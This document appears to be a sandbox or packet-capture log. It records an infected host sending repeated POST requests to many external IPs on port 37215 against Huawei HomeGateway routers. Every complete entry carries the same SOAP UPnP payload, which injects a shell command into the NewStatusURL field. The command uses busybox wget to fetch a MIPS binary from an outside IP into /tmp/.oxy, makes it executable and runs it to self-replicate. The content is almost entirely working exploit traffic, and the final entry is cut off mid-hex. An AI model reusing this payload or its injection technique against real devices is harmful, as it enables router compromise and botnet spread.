                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2283192.168.2.134494441.131.30.22037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.782207012 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2284192.168.2.1355814157.70.51.16937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.782227039 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2285192.168.2.1340570157.59.152.7337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.782243967 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2286192.168.2.1360404197.176.88.12937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.782332897 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2287192.168.2.1338812197.54.35.17937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.782342911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2288192.168.2.1339900157.255.162.7937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.782491922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2289192.168.2.1355900157.25.133.18837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.782533884 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2290192.168.2.1343908197.236.5.21437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.782552004 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2291192.168.2.1355598157.158.174.21337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.782563925 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2292192.168.2.1349950157.231.198.4837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.782685995 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 